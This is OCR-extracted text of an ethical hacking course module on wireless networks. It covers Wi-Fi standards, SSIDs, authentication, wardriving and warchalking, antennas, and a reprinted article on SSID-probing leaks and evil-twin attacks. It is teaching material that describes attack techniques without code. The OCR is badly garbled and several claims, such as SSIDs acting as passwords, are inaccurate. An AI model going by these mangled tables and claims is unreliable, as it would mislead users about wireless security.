CEHv8 Module 15 Hacking Wireless Networks PDF

W e t* 0 1
Ethical Hacking and Countermeasures Hacking Wireless Networks
Exam 312-50 Certified Ethical Hacker
H a c k in g W ire le s s N e tw o rk s
Module 15
En g in e e red by
Hackers.
Pre se n te d by Professio nals.
CcrtifM
CEH
EthKal
E th ic a l H a c k i n g a n d C o u n t e r m e a s u r e s v8
Module 15: Hacking W ireless Networks Exam 312-50
Module 15 Page 2135
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S e c u rity N ew s
CEH
S m a r tp h o n e W i-F i S e a rc h e s O ffe r M a s s iv e N e w D a ta L e a k a g e V e c t o r
0 4O cto b e r2 0 1 2
Our mobile phones are unwittingly giving away threat vectors to would-be hackers (and, for that matter, physical criminals as well), offering criminals a new way to tap information housed on smartphones. According to researcher at Sophos, the ability of smartphones to retain identifiers for the trusted WiFi networks they attach to automatically offers criminals a window into daily habits and exploitable information. "A wireless device goes through a discovery process in which it attempts to connect to an available wireless network. This may either be 'passive' listening for networks which are broadcasting themselves or 'active' sending out probe request packets in search of a network to connect to," said Sophos blogger Julian Bhardwaj. "It's very likely that your smartphone is broadcasting the names (SSIDs) of your favorite networks for anyone to see." It means that a would-be criminal can find out a lot about a person's daily movements - which coffee shops they visit, what their home network is called, which bookstores are frequented, and so on. http://www.infosecurity-magazine.com
Copyright by EC-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
S e c u rity N ew s
inputs
S m artp h o n e Wi-Fi S earches Offer M a ss iv e New D ata L e a k a g e V ector
Source: http://www.infosecuritv-magazine.com Our mobile phones are unwittingly giving away threat vectors to would-be hackers (and, for that matter, physical criminals as well), offering criminals a new way to tap information housed on smartphones. According to researchers at Sophos, the ability of smartphones to retain identifiers for the trusted Wi-Fi networks they attach to automatically offers criminals a window into daily habits - and exploitable information. "A wireless device goes through a discovery process in which it attempts to connect to an available wireless network. This may either be 'passive' - listening for networks which are broadcasting themselves - or 'active' - sending out probe request packets in search of a network to connect to," said Sophos blogger Julian Bhardwaj. "It's very likely that your smartphone is broadcasting the names (SSIDs) of your favorite networks for anyone to see."
Module 15 Page 2136
It means that a would-be criminal can find out a lot about a person's daily movements - which coffee shops they visit, what their home network is called, which bookstores are frequented, and so on. But aside from being a nice toolkit for a stalker, it also gives cybercriminals a way into the person's smartphone. Specifically, an attacker could set up a rogue Wi-Fi network with the same SSID as the one the user is trying to connect to, with the aim of forcing the phone to connect and transfer data through it. "So while someone knowing that your phone is trying to connect to BTHomeHub-XYZ' isn't immediately condemning, it may allow for them to launch a man-in-the-middle' attack against you, intercepting data sent between you and a friend, giving the impression you're talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker," explained Bhardwaj. "An evil twin' attack could even accomplish this without needing any knowledge of your Wi-Fi password - very damaging for all of those who use mobile banking for instance." All of that data darting across airwaves in an unencrypted fashion clearly offers a potentially huge security hole for an enterprising cybercriminal. In an effort to find out how real the danger is, Bhardwaj launched an experiment at a recent university open day in Warwick, UK. He ran a security demo in which he collected data from people walking by, displaying it for them to see. In just five hours, 246 wireless devices came into range. Almost half - 4 9 % - of these devices were actively probing for their preferred networks to connect to, resulting in 365 network names being broadcast. Of those, 25% were customized, non-standard network names. However, 7% of the names revealed location information, including three where the network name was actually the first line of an address. "W h at makes this even more worrying was how easily I was able to capture this sensitive information," he explained. "A tiny wireless router I purchased from eBay for $23.95 and some freely available software I found on Google was all I needed. I didn't even need to understand anything about the 802.1 protocols that govern Wi-Fi to carry out this attack." Coupled with a portable power source, a device could easily be hidden in a plant pot, garbage can, park bench and so on to lure Wi-Fi devices to attach to it. Mobile phone users can protect themselves somewhat by telling your phones to forget' networks you no longer use to minimize the amount of data leakage, he said. But, the unfortunate news is there doesn't appear to be an easy way to disable active wireless scanning on smartphones like Androids and iPhones," he noted, other than shutting Wi-Fi access completely off or disabling location-aware smartphone apps.
Copyright 2012
h t t p :/ / w w w .in f o s e c u r it v - m a g a z ir 1e . c o m / v ie w / 28616/ s m a r t p h o r 1e - w ifi- se a rch e s - o ffe r- rr 1assiven e w - d a ta - le a k a g e - v e c to r/
Module 15 Page 2137
M o d u le O b je c tiv e s
J J J J J J J J Types of W ireless Networks W ireless Terminologies Types of W ireless Encryption How to Break W E P Encryption W ireless Threats Footprint the W ireless Network G PS Mapping J J J W h a t Is Spectrum Analysis? How to Reveal Hidden SSIDs Crack Wi-Fi Encryption W ireless Hacking Tools Bluetooth Hacking H ow to BlueJack a Victim
CEH
H ow to Defend Against W ireless Attacks How to Discover Wi-Fi Network Using Wardriving J W ireless Traffic Analysis J J W ireless Security Tools W ireless Penetration Testing
M o d u le O b je c tiv e s
1 =
Wireless networks are inexpensive when compared to wired networks. But, theyare
more vulnerable to attacks when compared with the wired networks. An attacker can easily compromise the wireless network, if proper security measures are not applied or if the network is not configured appropriately. Employing a high security mechanism may be expensive. Hence, it is advisable to determine critical sources, risks, or vulnerabilities associated with it and then check whether the current security mechanism is able to protect you against all possible attacks. If not, then upgrade the security mechanisms. But, you should ensure that you leave no other doorway for attackers to reach and compromise the critical resources of your business. This module assists you in identifying the critical sources of your business and how to protect them. This module familiarizes you with:
Module 15 Page 2138
e e e 0 0 e e e
Types of Wireless Networks Wireless Terminologies Types of Wireless Encryption How to Break W EP Encryption Wireless Threats Footprint the Wireless Network GPS Mapping How to Discover Wi-Fi Network Using Wardriving
Q e e e e e e 0
W hat Is Spectrum Analysis? How to Reveal Hidden SSIDs Crack Wi-Fi Encryption Wireless Hacking Tools Bluetooth Hacking How to BlueJack a Victim How to Defend Against Wireless Attacks Wireless Security Tools
Wireless Penetration Testing
Wireless Traffic Analysis
Module 15 Page 2139
Ethical Hacking and Countermeasures Copyright by EC-C0Uncil All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le F low
C EH
M o d u le F lo w
A wireless network is a relaxed data communication system that uses radio frequency
technology with wireless media to communicate and obtain data through the air, which frees the user from complicated and multiple wired connections. They use electromagnetic waves to interconnect data an individual point to another without relying on any bodily construction. To understand the concept of hacking wireless networks, let us begin with wireless concepts. This section provides insight into wireless networks, types of wireless networks, wireless standards, authentication modes and process, wireless terminology, and types of wireless antenna.
Wireless Concepts
Wireless Encryption
&
Wireless Threats
||||||
Wireless Hacking Methodology
Wireless Hacking Tools
1 Bluetooth Hacking
Module 15 Page 2140
Module 15 Page 2141
Ethical Hacking and Countermeasures

Hacking Wireless Networks
W ire le s s N e tw o rk s
J J J
*
* * * *
Certified
CEH
I U kj I Hwfca
0
Wi-Fi refers to wireless local area networks (W LAN ) based on IEEE 802.11 standard It is a widely used technology for wireless communication across a radio channel Devices such as a personal computer, video-game console, smartphone, etc. use Wi-Fi to connect to a network resource such as the Internet via a wireless network access point
0
e Installation is fast and easy and eliminates wiring through walls and ceilings It is easier to provide connectivity in areas where it is difficult to lay cable Access to the network can be from anywhere within range of an access point Security is a big issue and may not meet expectations As the number of computers on the network increases, the bandwidth suffers WiFi enhancements can require new wireless cards and/or access points Some electronic equipment can interfere with the Wi-Fi networks
Public places like airports, libraries, schools or even coffee shops offer you constant Internet connections using Wireless LAN
A d va n ta g e s
Copyright by IG-COUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
W ire le ss N e tw o rk s
A wireless network refers to a computer network that is not connected by any kind of cables. In wireless networks, the transmission is made possible through the radio wave transmission system. This usually takes place at the physical layer of the network structure. Fundamental changes to the data networking and telecommunication are taking place with the wireless communication revolution. Wi-Fi is developed on IEEE 802.11 standards, and it is widely used in wireless communication. It provides wireless access to applications and data across a radio network. Wi-Fi sets up numerous ways to build up a connection between the transmitter and the receiver such as Direct-sequence Spread Spectrum (DSSS), Frequencyhopping Spread Spectrum (FHSS), Infrared (IR), and Orthogonal Frequency-division Multiplexing (OFDM). Advantages: 9 9 0 Installation is fast and easy and eliminates wiring through walls and ceilings. It is easier to provide connectivity in areas where it is difficult to lay cable. Access to the network can be from anywhere within range of an access point.
Module 15 Page 2142
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Using a wireless network, multiple members can access the Internet simultaneously without having to pay an ISP for multiple accounts.
Public places like airports, libraries, schools, or even coffee shops offer you a constant Internet connection using a wireless LAN.
Disadvantages: 9 9 9 9 Security is a big issue and may not meet expectations. As the number of computers on the network increases, the bandwidth suffers. Wi-Fi standards changed which results in replacing wireless cards and/or access points. Some electronic equipment can interfere with the Wi-Fi networks.
Module 15 Page 2143
20 10 v s . 2011 W i- F i D e v i c e T y p e C o m p a r i s o n
L
_ J
Source: http://www.meraki.com
Meraki, the cloud networking company, announced statistics showing the Wi-Fi device type comparison. The graph clearly shows that the iPads used significantly more Wi-Fi data than the average mobile device.
32%
2 0 11%
11% 4% 6% 7%
16%
13% |g
I I
Android Apple iPhone
I I
Apple iPod
M
Other
Windows XP
I I
Windows 7 /Vista
Apple iPad
Mac OS X
FIG URE15.1: Wi-Fi Device Type Com parison in th e y e a r 2011
Module 15 Page 2144
25%
25%
21% 2 0 1
7%
o
Summary: 9
1%
Android Apple iPhone
0%
Apple iPad
4%
II
Apple iPod Other
Windows xp
III
18%
Windows 7 /Vista
Mac OS X
http ://w w w .m eraki.c o m
FIGURE15.2: Wi-Fi Device Type Comparison in the year 2010
Between 2010 and 2011, mobile platforms overtook desktop platforms in percentage of Wi-Fi devices.
The iPhone is now the single most popular Wi-Fi device with 32% share.
Module 15 Page 2145
Wi-Fi Networks at Home and Public P laces

J Wi-Fi networks at hom e allow you to be w h erever you w ant with your laptop, iPad, or handheld device, and not have to make holes for hide Eth ern et cables J
C EH
You can find free/paid Wi-Fi access available in coffee shops, shopping malls, bookstores, offices, airport term inals, schools, hotels, and other public places
W i-Fi at Home
W i-Fi at Public Places

Copyright by EC-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
W i- F i N e tw o r k s a t H o m e a n d P u b lic P la c e s
A t H o m e Wi-Fi networks at home allow you to be wherever you want with laptop, iPad, or handheld device, and you don't need to make holes to hide Ethernet cables. If you have a wireless connection in your home, you can connect any number of devices that have Wi-Fi capabilities to your computer. The devices with Wi-Fi capability include Wi-Fi-capable printers and radios. P u b lic P la c e s Though these Wi-Fi networks are convenient ways to connect to the Internet, they are not secure, because, anyone, i.e., be it a genuine user or an attacker, can connect to such networks or hotspots. When you are using a public Wi-Fi network, it is best to send information only to encrypted websites. You can easily determine whether a website is encrypted or not by looking at the URL. If the URL begins with "https," then it is an encrypted website. If the network asks you for W PA password to connect to the public Wi-Fi network, then you can consider that hotspot a secure one.
Module 15 Page 2146
Types of Wireless Networks
(*rtifWtf
CEH
ith.ul H < k
Extension to a Wired Network
Multiple Access Points
11B
LAN-to-LAN Wireless Network
3G/4G Hotspot Copyright by EG-G(HIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
T y p e s o f W ir e le s s N e tw o rk s The following are the four types of wireless networks: E x t e n s io n to a W i r e d N e t w o r k network and the wireless devices. The access points are basically two types: 0 9 Software access points Hardware access points
A wireless network can also be established by using an access point, or a base station. With this type of network, the access point acts like a hub, providing connectivity for the wireless computers on its system. It can connect a wireless LAN to a wired LAN, which allows wireless computer access to LAN resources, such as file servers or existing Internet connections. To summarize: 9 Software Access Points (SAPs) can be connected to the wired network, and run on a computer equipped with a wireless network interface card.
Module 15 Page 2147
Hardware Access Points (HAPs) provide comprehensive support to most wireless features. With suitable networking software support, users on the wireless LAN can share files and printers situated on the wired LAN and vice versa.
Internet
FIGURE15.3: Extension to a Wired Network
M u lt ip le A c c e s s P o in ts This type of network consists of wireless computers connected wirelessly by using multiple access points. If a single large area cannot be covered by a single access point, multiple access points or extension points can be established. Although extension point capability has been developed by some manufacturers, it is not defined in the wireless standard. W hen using multiple access points, each access point wireless area needs to overlap its neighbor's area. This provides users the ability to move around seamless using a feature called roaming. Some manufacturers develop extension points that act as wireless relays, extending the range of a single access point. Multiple extension points can be strung together to provide wireless access to locations far from the central access point.
Module 15 Page 2148
Internet
FIGURE15.4: Multiple Access Points
* r
L A N to L A N W i r e l e s s N e t w o r k Access points provide wireless connectivity to local computers, and local computers on
different networks can be interconnected. All hardware access points have the capability of being interconnected with other hardware access points. However, interconnecting LANs over wireless connections is a monumental and complex task.
FIGURE15.5: Diagrammatical representation of LAN-to-LAN Wireless Network
Module 15 Page 2149
3 G H o ts p o t A 3G hotspot is a type of wireless network that provides Wi-Fi access to Wi-Fienabled devices including MP3 players, notebooks, cameras, PDAs, netbooks, and more.
Internet
3G Connection
A
Cell Tower
FIG URE15.6: D iagram m atical representatio n of 3G Hotspot
Module 15 Page 2150
Standard
A m e n d m e n ts
Freq. (GHz)
5 2.4 2.4
Modulation
OFDM DSSS OFDM, DSSS
Speed (Mbps)
54
Range (ft)
25-75 150 -150 150 -150
802.11a 802.11b 802.llg 802.H i 802.lln 802.16 (WiMAX) Bluetooth
1 1
54
Defines WPA2-Enterprise/WPA2-Personal for Wi-Fi 2.4, 5 OFDM 54 70 -1000 1-3
1 0 6 6
2.4
1 0 0
30 miles 25
Copyright by E&Cauicil. All Rights Reserved. Reproduction is Strictly Prohibited.
W ir e le s s S ta n d a rd s IEEE Standard 802.11 has evolved from an extension technology for wired LAN into
more complex and capable technology. W hen it first came out in 1997, the wireless local area network (W LAN) standard specified operation at 1 and 2 Mb/s in the infrared, as well as in the license-exempt 2.4-GHz Industrial, Scientific, and Medical (ISM) frequency band. An 802.11 network in the early days used to have few PCs with wireless capability connected to an Ethernet (IEEE 802.3) LAN through a single network access point. 802.11 networks now operate at higher speeds and in additional bands. W ith its growth, new issues have risen such as security, roaming among multiple access points, and even quality of service. These issues are dealt with by extensions to the standard identified by letters of the alphabet derived from the 802.11 task groups that created them. Q The 802.11a extension defines requirements for a physical layer (which determines, among other parameters, the frequency of the signal and the modulation scheme to be used) operating in the Unlicensed National Information Infrastructure (UNII) band, at 5 GHz, at data rates ranging from 6 Mb/s to 54 Mb/s. The layer uses a scheme called orthogonal frequency-division modulation (OFDM), which transmits data on multiple subcarriers within the communications channel. It is in many ways similar to the physical
Module 15 Page 2151
layer specification for HiperLAN II, the European wireless standard promulgated by the European Telecommunications Standards Institute. 6 Commercially trademarked in 1999 by the Wireless Ethernet Compatibility Alliance (WECA) as Wi-Fi, this extension made 802.11b a household word. It defines operation in the ISM 2.4GHZ band at 5.5 Mb/s and 11 Mb/s (as well as the fallback rates of 1 Mb/s and 2 Mb/s). This physical layer uses the modulation schemes complementary code keying (CCK) and packet binary convolutional coding (PBCC). WECA is an industry organization created to certify interoperability among 802.11b products from diverse manufacturers. 9 This task group's work on wireless LAN bridging has been folded into the 802.11 standard.
9
This task group enhances the 802.11 specifications by spelling out its operation in new regulatory domains, such as countries in the developing world. In its initial form, the standard covered operation only in North America, Europe, and Japan.
802.11 are used for real-time applications such as voice and video. To ensure that these time-sensitive applications have the network resources when they need them, it is working on extra mechanisms to ensure quality of service to Layer 2 of the reference model, the medium-access layer, or MAC.
802.11 standards have developed from the small extension points of wired LANs into multiple access points. These access points must communicate with one another to allow users to roam among them. This task group is working on extensions that enable communication between access points from different vendors.
This task group is working on high-speed extensions to 802.11b. The current draft of 802.l l g contains PSCC and CCK OFDM along with old OFDM as modulation schemes. Development of this extension was marked by a great deal of contention in 2000 and 2001 over modulation schemes. A breakthrough occurred in November 2001, and the task group worked to finalize its draft during 2002.
This task group is working on modifications to the 802.11a physical layer to ensure that 802.11a may be used in Europe. The task group is adding dynamic frequency selection and power control transmission, which are required to meet regulations in Europe. The original version of 802.11 incorporated a MAC-level privacy mechanism called Wired Equivalent Privacy (W EP), which has proven inadequate in many situations. This task group is busy with improved security mechanisms. The present draft includes Temporal Key Integrity Protocol (TKIP) as an improvement over W EP. 802.11a represents the third generation of wireless networking standards and technology.
802.H i standard improves WLAN security. The encrypted transmission of data between 802.11a and 802.11b WLANS is best described by 802.l l i . A new encryption key protocol such as Temporal Key Integrity Protocol (TKIP) and the Advanced Encryption Standard (AES) is defined by 802.l l i . TKIP is a part of standards from IEEE. It is an
Module 15 Page 2152
enhancement of WLANs. The other name for AES in cryptography is Rijndael. The U.S government adopted AES as the key for encryption standard.
802.l l n is a revision which enhanced the earlier 802.11 standards with multiple-input multiple-output (M IM O ) antennas. It works alike with 2.4 GHz and the minor used 5 GHz bands. This is an IEEE industry standard for Wi-Fi wireless local network transportations. OFDM is used in Digital Audio Broadcasting (DAB) and in Wireless LAN.
802.16a/d//e/m (W iM A X ) is a wireless communications standard desgined to provide 30 to 40 mbps rates. The original version of the standard on which W iM AX is based (IEEE 802.16) specified a physical layer operating in the 10 to 66 GHz range. 802.16a, updated in 2004 to 802.16-2004, added specifications for the 2 to 11 GHz range. 802.16-2004 was updated by 802.16e-2005 in 2005 and uses scalable orthogonal frequency-division multiple access (Orthogonal frequency-division multiplexing (OFDM) is a method of encoding digital data on multiple carrier frequencies.
Bluetooth is a wireless protocol mostly intended to be used by the shorter-range solicitations
The table that follows summarizes all the wireless standards mentioned on this slide:
Module 15 Page 2153
S ta n d a rd s
802.11a 802.11b 802.l l g 802.H i 802.l l n 802.16a/d//e/ m (WiMAX) Bluetooth
Freq. (G H z ) 5 2.4 2.4
M odulation OFDM DSSS OFDM, DSSS
Speed (M b p s) 54 11 54
R ange (ft) 25-75 150-150 150 -150
Provides WPA2 encryption for 802.11a, 802.11b and 802.llg networks 2.4-2.5 10-66 2.45 OFDM 54 70 -1000 1-3 ~100 30 miles 25
TABLE 15.1: Different Wireless Standards
Module 15 Page 2154
Service Set Identifier (SSID)

SSID is a token to identify a 802.11 (WiFi) n e tw o rk: by default it is the part of th e fram e header sent over a w ireless local area netw ork (W LA N ) the access points and clients
Urtiffetf
CEH
itkN jI lUilwt
It acts as a single shared identifier betw een
The SSID remains secret only on the closed networks w ith no activity, th a t is inconvenient to th e legitim ate users
Access points continuously broadcasts SSID . if enabled, for the client m achines to identify the presence of w ireless netw ork
SSID is a human-readable text Security concerns arise w hen the default values are not changed, as these units can be com prom ised string w ith a m aximum length of 32 bytes
A non-secure access m ode allow s clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as "a n y "
If the SSID of the netw ork is changed, reconfiguration of the SSID on every host is required, as every user of the netw ork configures the SSID into their system
Copyright by EG-G(l1ncil. All Rights Reserved. Reproduction is Strictly Prohibited.
S e r v ic e S e t Id e n t if ie r (S S ID ) The Service Set Identifier (SSID) is a unique identifier that is used to establish and
maintain wireless connectivity. SSID is a token to identify a 802.11 (Wi-Fi) network; by default it is the part of the packet header sent over a wireless local area network (WLAN). It act as a single shared password between access points and clients. Security concerns arise when the default values are not changed, since these units can then be easily compromised. SSID access points broadcasts the radio signals continuously received by the client machines if enabled. A non-secure access mode station communicates with access points by broadcasting configured SSID, a blank SSID, or an SSID configured as "any." Because SSID is the unique name given to WLAN, all devices and access points present in WLAN must use the same SSID. It is necessary for any device that wants to join the WLAN to give the unique SSID. If the SSID of the network is changed, reconfiguration of the SSID on every network is required, as every user of the network configures the SSID into their system. Unfortunately, SSID does not provide security to WLAN, since it can be sniffed in plain text from packets. The SSID can be up to 32 characters long. Even ifthe access points (APs) of these networks are very close, the packets of the two are not going to interfere. Thus, SSIDs can be considered a password for an AP, but it can be sent in clear text and can be easily discovered. In other words, SSIDs can be called a shared secret that everyone knows, and anyone can determine. The SSID remains secret only on the closed networks with no activity, which is inconvenient to the
Module 15 Page 2155
legitimate users. A key management problem is created for the network administrator, as SSID is a secret key instead of a public key. Some common SSIDs are: 6 9 9 Q 9 e comcomcom Default SSID Intel Linksys Wireless WLAN
Module 15 Page 2156
Wi-Fi Authentication Modes

Probe Request
UrtrfW*
CEH
itfciul Nm Im
vl/
*j
Probe Response (Security Parameters) Open SystemAuthentication Request
Open System Authentication Response Association Request (Security Parameters) Association Response
Open System Authentication Process

Authentication request sent to AP ends challenge text Client encryptschallenge text and sends it back to AP AP decrypts challenge text, and if correct, authenticates client
Access Point (AP)
Client connects to network
Shared Key Authentication Process

Copyright by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
W i- F i A u th e n tic a tio n M o d e s Wi-Fi authentication can be performed in two modes: 1. 2. Open system authentication Shared key authentication O p e n S y s t e m A u th e n tic a tio n P r o c e s s In the open system authentication process, any wireless station can send a request for authentication. In this process, one station can send an authentication management frame containing the identity of the sending station, to get authenticated and connected with other wireless station. The other wireless station (AP) checks the client's SSID and in response sends an authentication verification frame, if the SSID matches. Once the verification frame reaches the client, the client connects to the network or intended wireless station.
Module 15 Page 2157
Probe Request
vl/ 3 <
2
Probe Response (Security Parameters)
> VS/ i W
y C o ' o Switch or Cable Modem Internet
\3/ .............................................<
^ OjDen System Authentication Response . . . _ . Association Request (Security Parameters) Client attempting to connect < " Association Response o
Open System Authentication Request
Access Point (AP)
FIGURE 15.7: Open System Authentication m ode S h a r e d K e y A u th e n tic a tio n P r o c e s s In this process each wireless station is assumed to have received a shared secret key over a secure channel that is distinct from the 802.11 wireless network communication channels. The following steps illustrate how the connection is established in Shared Key Authentication process: 0 0 0 The station sends an authentication request to the access point. The access point sends challenge text to the station. The station encrypts the challenge text by making use of its configured 64-bit or 128-bit default key, and it sends the encrypted text to the access point. 0 The access point uses its configured W EP key (that corresponds to the default key of station) to decrypt the encrypted text. The access point compares the decrypted text with the original challenge text. If the decrypted text matches the original challenge text, the access point authenticates the station. 0 The station connects to the network.
The access point can reject to authenticate the station if the decrypted text does not match the original challenge text, then station will be unable to communicate with either the Ethernet network or 802.11 networks.
Authentication request sent to AP AP sends challenge text Client encrypts challenge text and sends it back to AP
\3/ ................................ <......................................

... . Client attempting to connect _. _ . >
~
AP decrypts challenge text, and if correct, authenticates client
Access Point (AP)
iwllcrl or 1 6 0 Modem lnternet
FIGURE 15.8: Shared key Authentication m ode
Module 15 Page 2158
W i- F i A u t h e n t ic a t io n P r o c e s s U s in g a C e n t r a liz e d A u t h e n tic a tio n S e r v e r
CEH
W i- F i A u t h e n t ic a t io n P r o c e s s U s in g a C e n t r a liz e d A u t h e n t ic a t io n S e r v e r The 802.lx provides centralized authentication. For 802.lx authentication to work on a wireless network, the AP must be able to securely identify traffic from a particular wireless client. The identification is accomplished by using authentication keys that are sent to the AP and the wireless client from the Remote Authentication Dial in User Service (RADIUS) server. W hen a wireless client comes within range of the AP, the following process occurs: 1. 2. 3. 4. Client sends an authentication request to the AP for establishing theconnection. The The The (AP sends EAP-Request for the identification of client. wireless client responds with its EAP-Response identity. AP forwards the identity to the RADIUS server using the uncontrolledport.
The RADIUS server sends a request to the wireless station via the AP, specifying the authentication mechanism to be used. 6. The wireless station responds to the RADIUS server with its credentials via the AP. 7. If the credentials are acceptable, the RADIUS server sends an encrypted authentication key to the AP.
Module 15 Page 2159
8. The AP generates a multicast/global authentication key encrypted with a per-station unicast session key, and transmits it to the wireless station.
FIGURE 15.9: Shared key Authentication m ode
Module
15 Page 2160
Ethical Hacking and Countermeasures Copyright by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
W ireless T erm inologies

GSM
Universal system used for mobile transportation for wireless network worldwide
CEH
ISM band
A set of frequency for the international Industrial, Scientific, and M edical communities
Association
The process of connecting a wireless device to an access point
Bandw idth
Describes the amount of information that may be broadcasted over a connection
BSSID
The MAC address of an access point that has set up a Basic Service Set (BSS)
D irect-seq uence Sp read Sp ectru m (D S S S )

Original data signal is multiplied with a pseudo random noise spreading code
Hotspot
Places where wireless network is available for public use
Frequency-hopping Sp read Sp ectru m (F H S S )

Method of transmitting radio signals by rapidly switching a carrier among many frequency channels
fSm
A cc e ss Point
Used to connect wireless devices to a wireless network
O rthogonal Freq uency-division M u ltip lexing (O FD M )

M ethod of encoding digital data on multiple carrier frequencies
Copyright by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited
ip
W ir e le s s T e r m in o lo g ie s
W ireless Terms
Description It is a universal system used for mobile transportation for wireless network worldwide The process of connecting a wireless device to an access point is called association The MAC address of an access point that has set up a Basic Service Set (BSS) Place where wireless network is available for public use Used to connect wireless devices to a wireless network A range of radio frequencies that are assigned for use by unlicensed users Describes the amount of information that may be broadcasted over a
GSM
Association
BSSID Hotspot Access Point ISM band Bandwidth
Module 15 Page 2161
Ethical Hacking and Countermeasures Copyright by EC-COlMCil All Rights Reserved. Reproduction is Strictly Prohibited.
connection It is used to transmit data on a stable range of the frequency band Data is transmitted on radio carriers which hop pseudo-randomly FHSS through many different frequencies at a pre-determined rate and hopping sequence OFDM Method of encoding digital data on multiple carrier frequencies with multiple overlapping radio frequency carriers TABLE 15.2: Wireless terms and descriptions
DSSS
Module 15 Page 2162
Wi-Fi C halking
W arW alking
Attackers walk around with Wi-Fi enabled laptops to detect open wireless networks
CEH
W a rFlyin g
In this technique, attackers fly around with Wi-Fi enabled laptops to detect open wireless networks
W a rC h alking
A method used to draw symbols in public places to advertise open Wi-Fi networks
W arD riving
Attackers drive around with Wi-Fi enabled laptops to detect open wireless networks
W i- F i C h a lk in g There are various techniques to detect open wireless networks. They are:
W a r W a lk in g To perform WarWalking, attackers walk around with Wi-Fi enabled laptops to detect open wireless networks. In this technique, the attacker goes on foot to conduct the Wi-Fi chalking. The disadvantage of this approach is the absence of a convenient computing environment and slower speed of travel.
W a r F ly in g (8 3 ) WarFlying is an activity in which attackers fly around with Wi-Fi enabled laptops to detect open wireless networks. This is also known as warstorming. As most of the people usually scan for the networks to map out the wireless networks in the area or as an experiment, most WarFlying is harmless. Also, it is more difficult to access open networks through WarFlying because of the nature of flying.
Module 15 Page 2163
W a r D r iv in g According to www.wordspy.com, WarDriving is a computer cracking technique that involves driving through a neighborhood with a wireless enabled notebook computer, mapping houses and businesses that have wireless access points.
W a r C h a lk in g . . 1 This term comes from whackers who use chalk to place a special symbol on a sidewalk or another surface to indicate a nearby wireless network that offers Internet access. It is a method used to draw symbols in public places to advertise open Wi-Fi networks.
Module 15 Page 2164
Wi-Fi C h alking Sym bols
(rtifwtf
CEH
IU mjI NMhM
Copyright by IG-CSUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
()
W i F i C h a l k i n g S y m b o l s Wi-Fi chalking symbols are inspired by hobo symbols. Matt Jones designed the set of
icons and publicized them. The following are the various Wi-Fi chalking symbols:
X
Free Wi-Fi
< ^6
Wi-Fi w ith MAC Filtering
< 56
Restricted Wi-Fi
)^
Pay for Wi-Fi
Wi-Fi w ith W PA
Wi-Fi w ith M ultiple Access Controls
Wi-Fi w ith Closed SSID
Wi-Fi Honeypot
F IG U R E 15.10: Various Wi-Fi chalking sym bols
Module 15 Page 2165
Types of Wireless Antennas

D ire ctio n a l A n te n n a
Used to broadcast and obtain radio waves from a single direction
Unidirectional Antenna
O m n id ire ctio n a l A n te n n a
Omnidirectional antennas provide a 360 degree horizontal radiation pattern. It is used in wireless base stations.
P arabolic G rid A n te n n a
It is based on the principle of a satellite dish but it does not have a solid backing. They can pick up Wi-Fi signals ten miles or more.
Y ag i A n te n n a
Yagi is a unidirectional antenna commonly used in communications fora frequency band of 10 MHz to VHF and UHF
Dipole A n te n n a
Bidirectional antenna, used to support client connections rather than site-tosite applications
Copyright by EG-G(HIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
T y p e s o f W ir e le s s A n te n n a s Antennas are important for sending and receiving radio signals. They convert electrical impulses into radio signals and vice versa. Basically there are five types of wireless antennas: D ir e c tio n a l A n te n n a ^ A directional antenna is used to broadcast and obtain radio waves from a single direction. In order to improve the transmission and reception the directional antenna is designed to work effectively in a few directions when compared with the other directions. This also helps in reducing interference. O m n id ir e c tio n a l A n te n n a Omnidirectional antennas radiate electromagnetic energy regularly in all directions. They usually radiate strong waves uniformly in two dimensions, but not as strongly in the third. These antennas are efficient in areas where wireless stations use time division multiple access technology. A good example of an omnidirectional antenna is one used by radio stations. These antennas are effective for radio signal transmission because the receiver may not be stationary. Therefore, a radio can receive a signal regardless of where it is.
Module 15 Page 2166
(ftb
'
P a r a b o lic G r id A n te n n a A parabolic grid antenna is based on the principle of a satellite dish but it does not have a solid backing. Instead of solid backing this kind of antennas has a semi-dish
that is formed by a grid made of aluminum wire. These grid parabolic antennas can achieve very long distance Wi-Fi transmissions by making use of the principle of a highly focused radio beam. This type of antenna can be used to transmit weak radio signals millions of miles back to earth. ((( ))} Y a g i A n te n n a Yagi is a unidirectional antenna commonly used in communications for a frequency band of 10 MHz to VHF and UHF. It is also called as Yagi Uda antenna. Improving the gain of the antenna and reducing the noise level of a radio signal are the main focus of this antenna. It doesn't only have unidirectional radiation and response pattern, but it concentrates the radiation and response. It consists of a reflector, dipole, and a number of directors. An end fire radiation pattern is developed by this antenna. D ip o le A n te n n a A dipole is a straight electrical conductor measuring half wavelength from end to end and connected at the RF feed line's center. It is also called as a doublet. It is bilaterally symmetrical so it is inherently a balanced antenna. These kinds of antennas are usually fed with a balanced parallel-wire RF transmission line.
Module 15 Page 2167
P arabolic G rid A ntenna

Parabolic grid antennas enable attackers to get better signal quality resulting in more data to eavesdrop on, more bandwidth to abuse and higher power output that is essential in Layer 1 DoS and m anin-the-middle attacks
CEH
SSID
Apple M y Wi-Fi GSM Wi-Fi Planet Awslocal
Channel Encryption 2 S 1 6 8 None WEP WEP None None
Authentication Unknown Unknown Unknown Unknown Unknown
Signal 24% 40% 64% 38% 54% j
P a r a b o lic G r id A n te n n a
Parabolic grid antennas enable attackers to get better signal quality resulting in more
data to eavesdrop on, more bandwidth to abuse, and higher power output that is essential in Layer 1 DoS and man-in-the-middle attacks. Grid parabolic antennas can pick up Wi-Fi signals from a distance of 10 miles. The design of this antenna saves weight and space and it has the capability of picking up Wi-Fi signals that are either horizontally or vertically polarized.
SSID
Apple My Wi-Fi GSM Wi-Fi Planet Awslocal
Channel Encryption
